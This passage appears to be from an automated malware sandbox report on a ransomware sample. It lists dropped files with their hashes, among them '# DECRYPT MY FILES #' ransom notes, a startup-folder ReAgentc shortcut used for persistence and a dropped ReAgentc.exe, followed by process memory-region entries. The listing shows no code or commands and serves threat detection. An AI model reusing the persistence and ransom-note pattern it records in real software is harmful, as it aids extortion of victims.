        efbd3ef56a225700ab6c62dec1785304036dced6f732286c6992e8b2628056547abf926c73cc47cf18e7b0931295f5c43db5052125c5ea1538f982cca5738c01

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        70050574e910a56d4c05bce5353a3561

        SHA1

        cc8bb6a382f841bc0a1a0c2d3821e512a7b8839b

        SHA256

        7ecc95281fe6058cf656e19c6a724f3c0ed78bc9ca927df635b521c199f33bbc

        SHA512

        13762d118182adac643433ac7e3732798be78449df5d5c12fe993891efefeafbc5d731d7df049eb639d4ebd2ee9899405d16ecb6d31bfa21ae0b007539d42c65

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        932579d0210ae64458e50220c60aab76

        SHA1

        003a49cac4ddcc789301d29e05b4f3a99c5fcb2b

        SHA256

        ef6a24acaeeede349b652c6f58fe570cc4499d01376617291ee3198345a9de66

        SHA512

        50120d67eb3e8bcbe0a73c81872c732a05690fb69909ab0d83c9c86575ebe48bd63baed7f9fe3d91006593bac5086fe8e3c292cf6a20239f9a3a61169acd9641

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        04cdebdbb0dba91886cbb89c3e2020b2

        SHA1

        5e39a57b5b9065eb9fa3fd019865754482ee4364

        SHA256

        462c41c313c46c7ec5099afe742004d73abac8c591b201c020252675a942b64e

        SHA512

        225ab5d7fae50a41383ad689f798edca05df8cd758dc306fd811da5548d3e24e37aa900534ba0fa2b6f6e04746df13e438e1210a481fd231b7b6ee0a093a63c6

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        8ac96fbe247ccf48e58d6c573521247d

        SHA1

        c8a7abd86b6c993efa5b2c4a1cdf3e82696dee86

        SHA256

        a31647faee7fa301b613a5e282a2ac6d39f7270dc0fa7f3ab4e8a295cf82d4d1

        SHA512

        d20ae4028a200f4e2952d6047b7148d508772baba941b6fcc845e52da715054dcb1b01c8cc80e34191bec2dd05af75faab7a05e2977e6c3088697783f800229f

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        1b28a34a7bd8442225bde0946f863507

        SHA1

        97f3413528ee45ad04fb501b95145339333e6250

        SHA256

        1377f84deadbbee64432928c83095a68c51679c2b77ec7c3ed8b8a0e8a81194c

        SHA512

        7fc5c81a642036817f0bf85aa5aed9e936a4e42d4373da49df8a18e21eabbb57c67c31ce019d54f3814f571a3e9f057505aed81cd470fa201b9c92b4f7a943bb

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        44a0d09268246f1fdd93fb5b42146d4b

        SHA1

        dc8629f43e8ca39f4592c3ca1f81a2d95240bcdc

        SHA256

        16a45e0424d7dd2be531b5c3159dfb97855fb23714fd203c0dad21810e74de7e

        SHA512

        179e7a7f440394b563305c5cce05fafbe687f7845e2553bb3b01d85d4841b70940ab803def4bd2d4fee8f4b46248fb2c9c225981f6673aeca55caa79f9f189a2

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        fc0eefae4b5b1dd74ff5717fea712b26

        SHA1

        dc8f52845400b231806935f409ae62d2f3e47ffd

        SHA256

        f6299a84187bdeaae4fe21f4db2843a280c9c39522832782d72e218836b2105a

        SHA512

        3154ce697aaba2373a63e1c031211598b264fa2924c2585ed3c97628efa1209577a5c26a837788cdab56f1e2d4bba8c915dbf39cd7410f59674cda8a4a247a32

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        6c767335cd341a5a037fb52ca0ce915e

        SHA1

        210a0213087f735fdcac3603f9a6a3b0a7f7fa03

        SHA256

        2f2b6ca6fac6c97ea96e575242500115397b49d76ad1fdfa7ae7eca3cd04909c

        SHA512

        d2089b30c7afd1f6830d9326534c00c4f8d316802eb84da6268a47fd0067a5126b3cd9d9d9a7b48273854552ce4d07c33319d8beb42d290bf4069fbc178b704d

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A1D62F91-F33D-11EF-B594-F245C6AC432F}.dat
        Filesize

        5KB

        MD5

        94a911d69db0f176aeafe45a72312caa

        SHA1

        6f9e0a65bb4b82edea69532d311d2209124fb9e4

        SHA256

        3b86a5fccb7e8a07323a4bbef4192f7c3ce6260ff3f843ea5ad4e669372ae789

        SHA512

        f70beb2a7694aaac62fd6b65cd6d8a065979b2d893f42f10ecf06ae777a1a9d4e96814e986c39b129a70eaf529a5538effd3ad5380d98c68b817098e1ddc4d80

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A1E21671-F33D-11EF-B594-F245C6AC432F}.dat
        Filesize

        4KB

        MD5

        7edfd90ef7c04bbd1470a7d3de321ba6

        SHA1

        206750d1fb7beae0282c8a458abae295b5265fc2

        SHA256

        cbecf05d61d0cb1173b7400abe37a645a6003c33291c162d163ceda6b115e710

        SHA512

        8837fcfb9a8143a888a7829c703f1d730dcdccd88cc7e51f5ffb1ce527dce2e52c58045c749a4aee9f0847225a745a94a16a86a4eb2b662eef8b6ec50d4338b0

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\json[1].json
        Filesize

        288B

        MD5

        1666bd5cb1768674d456702d7c10b1ca

        SHA1

        912f8c8182ec88e75ca0a4ca351b8c4c736ede10

        SHA256

        86f2793420d5cb9b2d2937e774810a406fc626f13183423665987f505d88c75b

        SHA512

        6053af897c7bb0cb237b86fbe202dc217d1d4f5ab3de27e9f8f64ebae4099543e9632d35eea17a7f0219b034c76206a96c5813735d7eb089f42e7c26300c532a

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\CabBF4C.tmp
        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\TarBFAD.tmp
        Filesize

        181KB

        MD5

        4ea6026cf93ec6338144661bf1202cd1

        SHA1

        a1dec9044f750ad887935a01430bf49322fbdcb7

        SHA256

        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

        SHA512

        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Bamako
        Filesize

        85B

        MD5

        313a92eb9dc6f52cf9368d7bdb49f636

        SHA1

        119974836f996a58a14584497d853e3f24b68057

        SHA256

        cde9b6a758da6349dc02027cc178ff4dd2b51676844935d134456bc814b74bdc

        SHA512

        15a851200cea62c693f3ceb03d56e77147aaea7d1019da66ea8cafca627a1316115a523c8f4f2aba9f4869d7e2cceb1e72bd328b7cdb7a11aa3f3f9a7b336d21

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Bunch.v
        Filesize

        207KB

        MD5

        c652bcadb640fd573f27f20e2a92330c

        SHA1

        57e3fa935f034f36144bf88cf68e466e2a0cbf78

        SHA256

        a0434610e8b106c95e6c1e38ab97b7de469c6aba822a10099abbed9676cdb7e9

        SHA512

        beb110c1bb8292f05ce39cba8277696e77d1e416f0b875cc56f8903fd4e0234088998076d9722511ee18f2b72002da2d8553886d13595218bc0b5fe90d50a5cf

        Download Submit

      • C:\Users\Admin\AppData\Roaming\MarketBerg.r
        Filesize

        5KB

        MD5

        90f6028a0ece910589440536a2b2e4c2

        SHA1

        5d74232f79f3edf9cf3bf75f6136d6562ac717b8

        SHA256

        2969857ca0d0a8643a00b3cdd166dbb6e92f138181d4445b2a331b025b1b325f

        SHA512

        ff6565953a336b01487c7e34513e69b20b0352b66d64246e5a0655c62ce35c1a5de06c01478363419bc1ec0a21c2260d2da2bb91f32aaf5617241b2252301ca4

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\ReAgentc.lnk
        Filesize

        1KB

        MD5

        2541a5d1b4256dfc6591c96caa599e20

        SHA1

        9e250083606b9737505f68d2a24d780ab7b2d846

        SHA256

        4d5d9bc4cf37d7f519a42f91c95bd8c12baa03aa644486410ef579fb393aca7b

        SHA512

        543edd59677645636e04c9b5d3b5fdeab434d8da5366c668181b2e595a92cc24bf71c1791ef5b7c31ff42ed5c332f2659b48191898b8dd22b9a484d20ca2451a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\f10.png
        Filesize

        2KB

        MD5

        7b2d4de6a17e9764343f9c1fa6c0ea82

        SHA1

        68ae38eeabd6f86f55c848bc0e936b85a1329794

        SHA256

        b0b48755492cd53fcc87cf3c93213d7553c10f1fab16ad1dec673bbc7c49470e

        SHA512

        9219ba9b2855e877ad26844130aac28046d9f1cc5223c9aeb8769209cb2471f792c3f32cb92d7467e640f249bf6959976d0c1ed85cee55cf89d3b6f2a0a585e8

        Download Submit

      • C:\Users\Admin\AppData\Roaming\f10.png
        Filesize

        1KB

        MD5

        ed204821db6fb0df953ab86f430dfc45

        SHA1

        4ff856384d2b8e7c736b305e42594238e4ff6a27

        SHA256

        8c3cd13d1dfc7cbf60442b1e8f4b8f829f87601028a75618979b01bfe69487e5

        SHA512

        84ff9a460a7014a7c18e60156ed2cb57ba69297244fd6ad2ea57731a459cd84dbb5cb4103f4b383f4d3d4cb0da2728335625077d1932c58489c5bf9388f94684

        Download Submit

      • C:\Users\Admin\AppData\Roaming\{33D7A01A-D90D-3DE7-A628-AFB91CA5B4EB}\ReAgentc.exe
        Filesize

        261KB

        MD5

        927635549829f48f929ead0fc59dcb84

        SHA1

        7c21f900ac8c3ca5311a77a591f002494ad7d85b

        SHA256

        db402b152ab036ca99afb8033ddcc6f227ce2f9947bd4a32e5b4a39c57fe9669

        SHA512

        db1672765f4cdb8faa6bfd7ae993ad27e8b4f25a894d9883624aae80bd33ae2bcb3c8d91e91961f10c8f714e2507766586759362e292b4a6e6f1ade6cf485c0a

        Download Submit

      • C:\Users\Admin\Documents\# DECRYPT MY FILES #.html
        Filesize

        19KB

        MD5

        c1b2117e7dda98218e26d530ee04a083

        SHA1

        aec97dc373a588793470cc953d3edb4512008ced

        SHA256

        e284d53e5f606a2bd6cd4d40b9c854332b3898f2f7991ae556c176fe81c6a990

        SHA512

        6b578ea0fdf85afb87a756386d025b4c0d889c26aeb4b624f706b8e8bb7eb894ea24c9db4a8c9c855d1d33a30103f0151c56af6c13a7b38fe308f88b29156487

        Download Submit

      • C:\Users\Admin\Documents\# DECRYPT MY FILES #.txt
        Filesize

        10KB

        MD5

        fbdd21323a20520dee6bcddf2c883207

        SHA1

        a8279b4c5cbd6cd0c570d546d951ad65ef42f373

        SHA256

        206c560b177cd0812dafcf7592947bb010d0c18c2773eb6264d6100e61da6306

        SHA512

        5cd7afa6d0d16f1c382a0a5acbf7f10dd8ef56e17780e3390c09a262acbb0bcdc629b96aceb80892fbe343776229d76495f6cdd66a01039624d0ef30e9518cc6

        Download Submit

      • C:\Users\Admin\Documents\# DECRYPT MY FILES #.url
        Filesize

        88B

        MD5

        cde38e2bdeb93f280cbb9a7ca18f991e

        SHA1

        940f546738749a167219cfa71f8aec78597590f5

        SHA256

        fd09952731ffe7e317ed727601aa65db9cd80d873b4fbde76014f24417490f38

        SHA512

        c1be98106a897373649b8082ca48b9e642690ef59828dd8c02a3fe952f64ef60c81646cd2a1c2a9ea613fb483e76149a9ddc3b6aea8f634e9b1a7cdb30fefc65

        Download Submit

      • C:\Users\Admin\Documents\# DECRYPT MY FILES #.vbs
        Filesize

        252B

        MD5

        18d46f5d8ebd3c7d6df0c7a8fd1bd64d

        SHA1

        aeb8407457434aabce2a4c2f95fe305c5303f929

        SHA256

        ceb35b75d397b07c84dfab3a28189e9431bdf80ec99ab65f9ccf01986bd4a8e9

        SHA512

        35fc759be0dee77eb9e39350873c24d9693cf6f370f171814e2ce6250ea814fea8a0887442ebae9077d6e9ff81ae7034faa0afcb080401a7d4ac384d2ba42d65

        Download Submit

      • \Users\Admin\AppData\Local\Temp\nsyA67D.tmp\System.dll
        Filesize

        11KB

        MD5

        6f5257c0b8c0ef4d440f4f4fce85fb1b

        SHA1

        b6ac111dfb0d1fc75ad09c56bde7830232395785

        SHA256

        b7ccb923387cc346731471b20fc3df1ead13ec8c2e3147353c71bb0bd59bc8b1

        SHA512

        a3cc27f1efb52fb8ecda54a7c36ada39cefeabb7b16f2112303ea463b0e1a4d745198d413eebb3551e012c84a20dcdf4359e511e51bc3f1a60b13f1e3bad1aa8

        Download Submit

      • \Users\Admin\AppData\Roaming\HelpButton.dll
        Filesize

        76KB

        MD5

        e87d836a5094e4720b19e8124b2d76d8

        SHA1

        da920dc64ba4368036311404b2ae1893e7053a05

        SHA256

        ce32626ed09ea15d255a8f2bb01e0c7665d2b83dd3d6ebc2c5d1d18dc35b4c30

        SHA512

        99e57fedf614b061f83454349c3491006b4edafcd830de1502fcad866e5f8d3495b849851078510c65b545030869d3dcddb3784f79316770756fb52553264aa1

        Download Submit

      • memory/552-87-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/552-91-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/552-90-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/552-89-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/552-84-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/552-80-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/552-81-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/552-476-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/552-479-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/552-482-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/552-485-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/1996-11-0x0000000001D40000-0x0000000001D54000-memory.dmp

        Filesize

        80KB

        Download

      • memory/2804-63-0x00000000003B0000-0x00000000003C4000-memory.dmp

        Filesize

        80KB

        Download

      • memory/2944-33-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2944-28-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2944-29-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2944-30-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2944-13-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2944-15-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2944-16-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2944-18-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2944-20-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2944-22-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2944-24-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2944-26-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2944-43-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

        Download